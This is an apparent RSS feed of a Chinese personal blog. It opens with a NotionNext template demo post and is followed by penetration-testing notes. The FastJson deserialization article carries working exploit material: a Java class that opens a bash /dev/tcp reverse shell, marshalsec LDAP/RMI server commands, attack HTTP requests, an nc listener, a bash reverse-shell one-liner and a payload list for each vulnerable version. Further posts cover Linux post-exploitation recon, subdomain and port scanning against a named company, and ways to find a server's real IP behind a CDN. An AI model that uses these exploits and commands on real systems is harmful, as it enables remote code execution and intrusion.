NotionNext BLOG https://hexo.xslover.xyz/ 这是一个由NotionNext生成的站点 Thu, 18 May 2023 07:09:16 GMT https://validator.w3.org/feed/docs/rss2.html https://github.com/jpmonette/feed zh-CN All rights reserved 2023, 轻言易梦 <![CDATA[这是“轻言易梦”第一篇文章。]]> https://hexo.xslover.xyz/article/example-1 https://hexo.xslover.xyz/article/example-1 Fri, 05 Nov 2021 00:00:00 GMT

基本段落

书中自有黄金屋,书中自有颜如玉
💡
生活的意义并不是与他人争高下,而在于享受努力实现目标的过程,结果只是对自己行动的嘉奖。

将进酒

李白〔唐代〕
君不见黄河之水天上来,奔流到海不复回。 君不见高堂明镜悲白发,朝如青丝暮成雪。 人生得意须尽欢,莫使金樽空对月。 天生我材必有用,千金散尽还复来。 烹羊宰牛且为乐,会须一饮三百杯。 岑夫子,丹丘生,将进酒,杯莫停。 与君歌一曲,请君为我倾耳听。 钟鼓馔玉不足贵,但愿长醉不愿醒。 古来圣贤皆寂寞,惟有饮者留其名。 陈王昔时宴平乐,斗酒十千恣欢谑。 主人何为言少钱,径须沽取对君酌。 五花马、千金裘,呼儿将出换美酒,与尔同销万古愁。
TANGLY's BLOG | 记录思考、分享我的学习笔记
记录思考、分享我的学习笔记
TANGLY's BLOG | 记录思考、分享我的学习笔记
https://tangly1024.com/
TANGLY's BLOG | 记录思考、分享我的学习笔记
 

特殊段落

1.代码

# Bash 安装zsh
$ sudo apt install zsh

# 配置ohmyzsh
$ sh -c "$(curl -fsSL <https://raw.github.com/robbyrussell/oh-my-zsh/master/tools/install.sh>)"

# 配置ohmyzsh插件
# zsh-autosuggestions
$ git clone git://github.com/zsh-users/zsh-autosuggestions $ZSH_CUSTOM/plugins/zsh-autosuggestions

# zsh-syntax-highlighting
$ git clone <https://github.com/zsh-users/zsh-syntax-highlighting.git> ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting

// 启用插件
$ vim .zshrc
plugins=(git z zsh-autosuggestions zsh-syntax-highlighting)
其他更多语言
ps -ef | grep java | awk '{print $2}' | xargs kill -9
@Test
public void test11() {

  long start = System.currentTimeMillis();
  int a = 0;
  for(int i=0;i<1000000000;i++){
      try {
          a++;
      }catch (Exception e){
          e.printStackTrace();
      }
  }
  long useTime = System.currentTimeMillis()-start;
  System.out.println("useTime:"+useTime);
}
#!/usr/bin/python3
import json
 
# Python 字典类型转换为 JSON 对象
data = {
    'no' : 1,
    'name' : 'hello',
    'url' : 'http://tangly1024.com'
}
 
json_str = json.dumps(data)
print ("Python 原始数据:", repr(data))
print ("JSON 对象:", json_str)
# R 语言
#file.edit(path.expand(file.path("~", ".Renviron")))
library(telegram.bot)
library(stringr)
# Initiate the bot session using the token from the enviroment variable.
bot = Bot(token = bot_token('your_bot'))
usr_list <- c(12344566, 12345566)
html {
	background-color: red;
}
#include <iostream>
using namespace std;
 
// main() 是程序开始执行的地方
 
int main()
{
   cout << "Hello World"; // 输出 Hello World
   return 0;
}
using System;
namespace HelloWorldApplication
{
   class HelloWorld
   {
      static void Main(string[] args)
      {
         Console.WriteLine("Hello World");
         Console.ReadKey();
      }
   }
}
.section __TEXT,__text,regular,pure_instructions
.macosx_version_min 10, 13
.globl _add_a_b
.p2align 4, 0x90
_add_a_b: ## @add_a_b
.cfi_startproc
## BB#0:
pushq %rbp
Lcfi0:
.cfi_def_cfa_offset 16
Lcfi1:
.cfi_offset %rbp, -16
movq %rsp, %rbp
Lcfi2:
.cfi_def_cfa_register %rbp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movl -4(%rbp), %esi
addl -8(%rbp), %esi
movl %esi, %eax
popq %rbp
retq
.cfi_endproc

.globl _main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## BB#0:
pushq %rbp
Lcfi3:
.cfi_def_cfa_offset 16
Lcfi4:
.cfi_offset %rbp, -16
movq %rsp, %rbp
Lcfi5:
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $1, %edi
movl $2, %esi
movl $0, -4(%rbp)
callq _add_a_b
addq $16, %rsp
popq %rbp
retq
.cfi_endproc

2.公式

  • 数学公式
  • 化学方程
其他更多公式
 

3. 图表

graph LR;
公司架构-->商务
公司架构-->研发
公司架构-->设计
公司架构-->运营
公司架构-->产品
思维导图

4. PDF嵌入

5.下载附件

下载PDF附件.pdf
469.5KB

6. 照片集

照片集
照片标题1
照片标题1
照片标题3
照片标题3

7. 内嵌网页

5.代办

家庭
洗衣
做饭
事业
开会
加班

6.折叠列表

点击展开
点击展开
点击展开
内容可以多级嵌套
 

8. 同步块

Notion支持将不同页面的块进行同步,即 SyncBlock,以下是来自另一个页面的块:
【sync-block】这是一段来自示例文章-3的段落 ,通过 SyncBlock同步。
💡
注意 : 同步块的使用条件是源页面也要被开放共享 ,否则NotionNext将无权访问,页面上会被忽略渲染。
notion image
 

多级目录

heading标题在博客中自动转为目录

二级目录1

二级内容 1

二级目录2

二级内容2

二级目录3

三级目录3.1

不同级别的heading代表不同级别的目录

三级目录3.2

高一级目录嵌套低一级目录

多级列表

  • 事物的必然性
  1. 事物按规律变化,也有一种不可避免的性质.这种性质就叫做必然性
    1. 事物的必然性,是事物本身的性质(我们反对宿命论的是其认为这一切是受神明的支配,而不是反对事物发展中存在的不可避免的性质的事实)
      1. 第三级别列表
      2. 第三级别列表
    2. 其决定于它自己本身发展的情况和周围的条件
      1. 第三级别列表
        1. 第三级别列表

模板使用说明

若要部署你的NotionNext项目,请复制该模板,并按照模板格式创建文章:
NOTION BLOG
演示站点描述
https://tanghh.notion.site/02ab3b8678004aa69e9e415905ef32a5?v=b7eb215720224ca5827bfaa5ef82cf2d
NOTION BLOG
Notion页面中,每篇文章都将有以下属性🤔:
属性
必填
说明
备注
title
文章标题
status
发布状态
(仅当状态为Published 时会被 展示)
type
页面类型 (博文Post / 单页(Page)
单页不会在博文列表显示 。
summary
内容摘要
搜索和简略显示会用到
date
发布日期
在V3.3.9之前的版本此项为必填。
category
文章分类
可以自定义
tags
文章标签
可多个,建议不要太多
slug
文章短路径
(每篇文章唯一,请勿 重复)
icon
菜单栏图标(仅当Page类型有效)
可以参考:图标库地址
password
文章加锁
需要输入密码才允许访问

评论插件

系统支持 Waline\Giscus\Valine\GitTalk\Utterance\Cusdis\Twikoo六种评论插件,并且可以同时开启,点击评论区的Tab来体验。
按照以下教程可以开启响应的评论插件
NotionNext配置评论插件Twikoo | TANGLY's BLOG
一个简洁、安全、免费的静态网站评论系统,基于 腾讯云开发 。 经评论区网友推荐,我开始使用 Twikoo,一番体验,发现Twikoo真的很强大,目前我决定用它作为主要评论插件。 twikoo支持在页面上直接管理评论、配置插件,非常强大 在最新版本中 NotionNext已经 支持该评论插件,配置 方法很简单: 在Vercel后台添加一个环境变量 NEXT_PUBLIC_COMMENT_ENV_ID ; 值为您部署好的 twikoo 后台地址。以我的举例: 借助vercel,您可以非常快速地部署自己的twikoo后台,用于储存评论数据。 twikoo的后台数据存储是基于MongoDB数据库的,我们可以先注册创建一个免费的在线MongoDB数据库。 创建MongoDB数据库 1.注册账号 创建数据库 这里下方要设置一个允许访问该数据库的IP地址,推荐设置0.0.0.0,即所有地址都允许访问,毕竟我也不知道自己会用什么ip访问这个数据库。 2.获取数据库连接地址 Vercel一键部署 点击Create将twikoo的代码拷入您的仓库 配置MongoDB数据库地址 添加一个配置 MONGODB_URI 环境变量即可,其值为上一步获得的MongoDB连接地址,注意将链接中MONGODB的密码 替换成您设置的。 上述部署完成后,您将获得一个vercel的twikoo后台页面,您可以选择像我一样映射成二级域名 将您的twikoo后台地址配置在NotionNext的后台,并redeploy即可。 到此完成~ 点击右下角的小齿轮即可配置您的管理员密码、并进行更多的功能设置。赶快体验吧~ 可以访问官方文档获取安装部署帮助,并且查看Twikoo的更多特性。 NotionNext支持多种评论插件,可访问以下文章获得帮助:
NotionNext配置评论插件Twikoo | TANGLY's BLOG
https://tangly1024.com/article/notionnext-twikoo
NotionNext配置评论插件Twikoo | TANGLY's BLOG
NotionNext如何添加评论插件 | TANGLY's BLOG
NotionNext支持多种评论插件,其中体验比较好的我个人觉得是Twikoo,您可以参考以下教程进行配置安装: 您也可以选择Valine/Waline,关于Valine/Waline的部署可以访问此篇文章: Utterance 、 Giscus 、Gitalk 其中部署最便捷的当属 Cusdis 和 Utterance 这两个插件。您可以任选一个部署,当然,您也可以选择同时部署多个。 完成效果预览 点击Start for free ,并用Github登录即可 Sign in With Github (点击查看截图) [可选] 配置邮件通知地址,以便收到新评论时邮件通知您,(点击展开截图) 点击Embed Code获取您的应用ID,即data-app-id, 复制这串id备用。 在Vercel后台添加一个环境变量 NEXT_PUBLIC_COMMENT_CUSDIS_APP_ID,值为上面获取到的data-app-id。 完成预览效果 在您的Github中创建一个开源项目用于存放评论 在github中安装utterance插件 允许utterance访问所有仓库,并勾选install,可以只勾选作为评论用的仓库地址。 将用作评论仓库名添加到Vercel添加环境变量 后台 settings→ environment variables → 添加 → save 即可。如下图: 注意, 仓库名的格式是 [您的用户名/您的仓库名] 如下示例 完成预览效果 在您的Github中创建一个开源项目用于存放评论 创建一个授权秘钥,并保存您的ClientID与ClientSecret Authorization callback URL 填写您网站域名 填写配置的效果 ,点击 register application 即可创建。 点击 Generate a new client secret 生成您的密码 复制 Client ID和刚生成的 Client secret (对应图中2和3)备用。 在Vercel后台配置环境变量 NEXT_PUBLIC_COMMENT_GITALK_CLIENT_ID NEXT_PUBLIC_COMMENT_GITALK_CLIENT_SECRET NEXT_PUBLIC_COMMENT_GITALK_CLIENT_ID NEXT_PUBLIC_COMMENT_GITALK_CLIENT_SECRET 项目会在您的Github项目讨论区创建评论数据,便于维护管理 , 完成效果 预览 您可以在Github的Discusstion讨论区随时管理评论。 在您的Github中创建一个开源项目用于存放评论 在项目Setting中开启discussion功能 在Github中安装giscus应用 点击右上方的Install即可,并确认 允许访问仓库数据权限: 默认勾选All repositories即可。也可以只勾选用作评论的仓库,(后续还可以再回来配置) 访问Giscus填写并获取您的Giscus配置参数 主要配置输入您的仓库名,并选择 Discussion分类为 Announcements .
NotionNext如何添加评论插件 | TANGLY's BLOG
https://tangly1024.com/article/notion-next-comment-plugin
NotionNext如何添加评论插件 | TANGLY's BLOG
NotionNext配置Valine/Waline评论插件 | TANGLY's BLOG
Valine插件需要LeanCloud后端提供数据库存储功能,请按照以下步骤配置。 而Waline 的前置步骤和Valine基本一致,只是多了一个部署Waline的Vercel服务步骤。由于Waline配置了完善的后台管理功能,所以使用Waline就不需要再配合Admin-Valine项目运行。 应用创建好以后,进入刚刚创建的应用,选择左下角的 设置> 应用Key,然后就能看到你的 APP ID和 APP Key 了: 为了你的数据安全,请设置自己的 安全域名 :只有以下设置的域名,才允许访问你的valine数据 支持的Valine配置在NotionNext项目的blog.config.js 中,请在Vercel后台的环境变量中配置: serverURLs在应用内部会尝试自动获取,如果发现获取失败,请手动提供 刚刚创建的应用,选择左下角的 设置> 应用Key,找到 Request 域名 第一行 需要在akismet中注册账号并获取免费的key: https://akismet.com/account ,并在LeanCloud中配置 AKISMET_KEY 变量 参考官方文档,在你的Vercel上部署一个valine应用。而后在你的NotionNext环境变量中添加你的waline服务地址环境变量: NEXT_PUBLIC_WALINE_SERVER_URL 即可生效。
NotionNext配置Valine/Waline评论插件 | TANGLY's BLOG
https://tangly1024.com/article/notionnext-valine
NotionNext配置Valine/Waline评论插件 | TANGLY's BLOG
 
]]> <![CDATA[FastJson反序列化漏洞集合]]> https://hexo.xslover.xyz/article/c1962fdf-2f8b-4c0b-aef7-513155e3b852 https://hexo.xslover.xyz/article/c1962fdf-2f8b-4c0b-aef7-513155e3b852 Tue, 18 Apr 2023 00:00:00 GMT

FASTJSON反序列化命令执行(CVE-2017-18349)

复现原理

fastjson 在解析 json 的过程中,支持使用 autoType 来实例化某一个具体的类,并调用该类的 set/get 方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

根据官方给出的补丁文件,主要的更新在这个 checkAutoType 函数上,而这个函数的主要功能就是添加了黑名单,将一些常用的反序列化利用库都添加到黑名单中。

漏洞版本

fastjson<=1.2.24

挖掘思路

FastJsonScan
notion image
POST / HTTP/1.1
Host: you-attack.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.78
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/json
Content-Length: 117

{"dr":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://7uk0kj.dnslog.cn/Object","autoCommit":true}}
notion image
DNSLOG测试是否出网:
notion image

漏洞环境

notion image

漏洞复现:(测试中)

1.DNSLOG漏洞验证

POST / HTTP/1.1
Host: you-attack.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.78
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/json
Content-Length: 117

{"dr":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://7uk0kj.dnslog.cn/Object","autoCommit":true}}
notion image
DNSLOG测试是否出网:
notion image

2.编译Exploit.java生成exp文件

Exploit.java
反弹ip需要自定义更换成自己服务器ip。
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/you-server-ip/28447;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

javac Exploit.java
编译成功后,得到Exploit.class文件,将它上传到服务器,用于命令执行。
notion image

3.开启远程http服务放置exp文件

python -m SimpleHTTPServer 28443
notion image
notion image

4.开启ldap服务设置远程执行命令

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer <http://you-server-ip:28443/#Exploit> 28448 Listening on 0.0.0.0:28448

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer <http://101.32.116.167:20443/#Object> 20444 Listening on 0.0.0.0:20
notion image

5.发送payload报文反弹shell

POST / HTTP/1.1
Host: you-attack.com
Content-Length: 285
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: <http://you-attack.com>
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.78
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: <http://you-attack.com/>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://you-server-ip:28448/Exploit.class",
        "autoCommit": true
    }
}
成功远程调用exp执行系统命令,反弹shell
notion image
notion image

6.成功接收到shell

notion image

漏洞修复

将fastjson升级到最新版本

FASTJSON_TOOL一键GETSHELL(成功)

1.nc设置侦听端口

nc -lvp 28447
notion image

2.fastjson_tool设置执行命令

java -cp fastjson_tool.jar fastjson.HRMIServer you-server-ip 28444 "bash=bash -i >&/dev/tcp/you-server-ip/28447 0>&1"
notion image

3.发送报文反弹shell

POST / HTTP/1.1
Host: you-attack.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.78
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/json
Content-Length: 121

{"dr":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://you-server-ip:28444/Object","autoCommit":true}}
notion image

4.成功接受到shell

notion image

漏洞检测

报错检测方法

{"dr":
notion image

DNSLOG检测

payload:
{"dr":{"@type":"java.net.Inet4Address","val":"lll55w.ceye.io"}}

{"dr":{"@type":"java.net.Inet6Address","val":"lll55w.ceye.io"}}
notion image
收到报文:
notion image

版本PAYLOAD集合

fastjson<=1.2.24

{"dr":"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://you-server-ip:28444/Object", "autoCommit":true}}

fastjson<=1.2.41

autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
{"dr":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}
}

fastjson<=1.2.42

autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
{"dr":{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}}

fastjson<=1.2.43

autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
{"dr":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}
}

fastjson<=1.2.45

autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
{"dr":{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}
}

fastjson<=1.2.47

{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://x.x.x.x:1999/Exploit",
        "autoCommit": true
    }
}

fastjson<=1.2.62

{"dr":{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}"}

fastjson<=1.2.66

autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
{"dr":{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://you-server-ip:28444/Object"}}

{"dr":{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://you-server-ip:28444/Object"}}

{"dr":{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://you-server-ip:28444/Object"}
}

{"dr":{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://you-server-ip:28444/Object"}}
}
]]> <![CDATA[Linux信息收集-内网渗透]]> https://hexo.xslover.xyz/article/48599e98-c4bb-49a0-9ab4-d3987fa7463c https://hexo.xslover.xyz/article/48599e98-c4bb-49a0-9ab4-d3987fa7463c Tue, 18 Apr 2023 00:00:00 GMT

基本信息收集

查看安装程序

ls -alh /usr/bin
notion image
dpkg -l
notion image

可写权限目录

# 2>/dev/null 错误信息从定向
find /var/www/ -writable -type d 2>/dev/null
notion image

可执行权限目录

find /var/www/ -executable -type d 2>/dev/null
notion image

查看主机工作计划

crontab -l ls -alh /var/spool/cron

cat /etc/cron* cat /etc/at.allow

cat /etc/at.deny cat /etc/cron.allow

cat /etc/cron.deny cat /etc/crontab

cat /etc/anacrontab

cat /var/spool/cron/crontabs/root
ls -al /etc/ |grep cron ls -al /etc/cron*
cat /etc/cron.deny cat /etc/crontab
notion image

查看PASSWORD的文件

find / -name "*.php*" -print0 | xargs -0 grep -i "var $password"

查看网络连接

# 查看80端口
netstat -pantu | grep 80
]]> <![CDATA[信息收集-扫描工具]]> https://hexo.xslover.xyz/article/23c25ba6-0b59-4567-8ead-1f5f2f250cc0 https://hexo.xslover.xyz/article/23c25ba6-0b59-4567-8ead-1f5f2f250cc0 Mon, 17 Apr 2023 00:00:00 GMT

LAYER扫描器

notion image

ONEFORALL

notion image
notion image

安装使用

  1. 下载更新:
      2. git clone <https://github.com/shmilylty/OneForAll.git>
  1. 安装依赖
      2. python -m pip install -U pip setuptools wheel -i <https://mirrors.aliyun.com/pypi/simple/>


pip3 install -r requirements.txt -i <https://mirrors.aliyun.com/pypi/simple/>

常规扫描

python3 oneforall.py --target dbappsecurity.com.cn run

-target 扫描目标

python3 oneforall.py --target dbappsecurity.com.cn --port default run
notion image
notion image

-port 扫描端口

python3 oneforall.py --target dbappsecurity.com.cn --port default run
python3 oneforall.py --target dbappsecurity.com.cn --port smail run
python3 oneforall.py --target dbappsecurity.com.cn --port large run
python3 oneforall.py --target dbappsecurity.com.cn --port self run
self_ports: 需要自己添加端口,我们可以使用nmap扫描开放端口后,手动添加到这个列表里面去。
notion image

参数使用

--valid
只导出存活的子域结果(默认False)
python3 oneforall.py --target example.com --valid None run
--req
HTTP请求子域(默认True)
python3 oneforall.py --target example.com --req False run
--dns
DNS解析子域(默认True)
--brute
使用爆破模块(默认False)

扫描结果

notion image

SUBDOMAIN3( 测试中 )

安装使用

  1. 下载更新
      2. git clone <https://github.com/yanxiu0614/subdomain3.git>
  1. 安装依赖
      2. pip install -r requirement.txt

常规扫描:

python3 brutedns.py -d dbappsecurity.com.cn -s fast -l 2
notion image

d 指定URL

python3 brutedns.py -d dbappsecurity.com.cn

s 探测速度

速度模式,三种速度模式:fast,medium,low
brutedns.py -d dbappsecurity.com.cn -s fast

l 探测等级

指定探测域名等级,2级域名或者3级域名?
2:w.baidu.com; 3:w.w.baidu.com;
python3 brutedns.py -d dbappsecurity.com.cn -l 2
###########################################################################

目录扫描-模糊测试

DIRSEARCH

常规扫描

python3 dirsearch.py -e *  -x 403  -t 20  -u <http://192.168.12.13/dvwa/>
notion image

c 指定COOKIES

python3 dirsearch.py -e *  -x 403  -t 20  -u <http://192.168.12.13/dvwa/>  -c "Cookie: security=high; PHPSESSID=b7224986 1f66b03958e3a23a1cd08c73"

-proxy 指定代理

python3 dirsearch.py -e *  -x 403  -t 20  -u <http://192.168.12.13/dvwa/>  --proxy "<http://127.0.0.1:8080>"
notion image

u 指定扫描目标

e 指定扫描类型

x 状态码排除

XRAY

安装使用

常规扫描

-listen 被动扫描

--html-output: 当扫描没有发现问题时,则不会生成结果文件。

.\\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xray-testphp.html
notion image

-basic-crawler 爬虫式扫描

.\\xray_windows_amd64.exe webscan --basic-crawler <http://xx.com/> --html-output xray-crawler-1111.html

burp联动被动扫描

  1. xray开启web扫描侦听
      2. .\\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xray-testphp.html
  1. burp设置代理转发
      2. notion image
  1. 浏览器设置burp代理,开始联动扫描

servicescan 服务扫描

速检测单个目标
.\\xray_windows_amd64.exe servicescan --target 127.0.0.1:8009
批量检查的 1.file 中的目标, 一行一个目标,带端口
./xray servicescan --target-file 1.file

subdomain 子域名扫描

-target, -t

-no-brute

-web-only

-ip-only

-xxxx-output 结果输出

  • -html-output 结果输出为html
./xray servicescan --target 127.0.0.1:8009 --html-output service.html
  • -json-output 结果输出为json
./xray servicescan --target 127.0.0.1:8099 --json-output 1.json

WEBALIVESACAN

安装使用

pip3 install -r requirements.txt -i <https://mirrors.aliyun.com/pypi/simple/>

-port 端口探测

python3 webscan.py --target target.txt --port 80
python3 webscan.py --target target.txt --port large

-burte 目录探测

python3 webscan.py --target target.txt --port 80 --brute True

指纹识别-WEB识别

WHATWEB

whatweb <http://192.168.12.111:8080>
notion image

a 1 扫描等级

设置扫描等级: 级别为1-4,默认为1
whatweb <http://192.168.12.111:8080> -a 1

i 列表扫描

whatweb -i /root/ips.txt

-info-plugins 指定扫描插件

枚举所有插件:
whatweb -l

显示插件具体内容:
whatweb --info-plugins [插件名称]

-log-xml 导出结果

whatweb you@url --log-xml web_scan.xml

IPDIC扫描-主机存活

MASSCAN

Masscan号称是最快的互联网端口扫描器,最快可以在六分钟内扫遍互联网。
Masscan:https://github.com/robertdavidgraham/masscan
一般情况下,用于主机存活探测,因为masscan的探测速率过快,端口扫描时经常会出现缺漏,所以,我们一般用于探测存活ip,之后再将存活ip发送至nmap进行端口弱点探测。

安装使用

sudo apt-get install git gcc make libpcap-dev
git clone <https://github.com/robertdavidgraham/masscan>
cd masscan
make
cp bin/masscan /bin/

常规扫描

masscan 10.10.10.1 -p1-65535 --rate 1000 -oX masscan_result_0508.xml
masscan 10.10.10.1/24 -p1-65535 --rate 5000 -oX masscan_result_0508.xml
]]> <![CDATA[Bypass-CDN网站查找真实IP地址]]> https://hexo.xslover.xyz/article/2d1c110e-97fa-455a-a812-819bf1818e76 https://hexo.xslover.xyz/article/2d1c110e-97fa-455a-a812-819bf1818e76 Mon, 17 Apr 2023 00:00:00 GMT

几种访问方式的不同

传统访问:用户访问域名—>解析服务器IP—>访问目标主机
普通CDN:用户访问域名—>CDN节点—>真实服务器IP—>访问目标主机
带WAF的CDN:用户访问域名—>CDN节点(云WAF)—>真实服务器IP—>访问目标主机

查询域名相关网站

DNS查询:<https://dnsdb.io/zh-cn/>
微步在线:<https://x.threatbook.cn/>
在线域名信息查询:<http://toolbar.netcraft.com/site_report?url=>
DNS、IP等查询:<http://viewdns.info/>
CDN查询IP:<https://tools.ipip.net/cdn.php>
SecurityTrails平台:<https://securitytrails.com/domain/www.baidu.com/history/a>

如何判断网站是否有CDN?

使用不同地方的 ping 服务,查看对应 IP 地址是否唯一,如果不唯一则极有可能是使用了CDN ping测试网站有:
<https://wepcc.com/>
<http://ping.chinaz.com/>
<http://ping.aizhan.com/>

绕过CDN查找网站真实IP

notion image

子域名探测

很多时候,一些重要的站点会做CDN,而一些子域名站点并没有加入CDN,而且跟主站在同一个C段内,这时候,就可以通过查找子域名来查找网站的真实IP。

网络空间安全引擎搜索

通过关键字或网站域名,就可以找出被收录的IP,很多时候获取到的就是网站的真实IP。

钟馗之眼:<https://www.zoomeye.org>
Shodan:<https://www.shodan.io>
Fofa:<https://fofa.so>
notion image

利用SSL证书寻找真实IP

证书颁发机构(CA)必须将他们发布的每个SSL/TLS证书发布到公共日志中,SSL/TLS证书通常包含域名、子域名和电子邮件地址。因此SSL/TLS证书成为了攻击者的切入点。

<https://censys.io/ipv4?q=baidu.com>
notion image

国外主机解析域名

大部分 CDN 厂商因为各种原因只做了国内的线路,而针对国外的线路可能几乎没有,此时我们使用国外的DNS查询,很可能获取到真实IP。

<https://asm.ca.com/zh_cn/ping.php>
<http://host-tracker.com/>
<http://www.webpagetest.org/>
<https://dnscheck.pingdom.com/>
notion image
]]>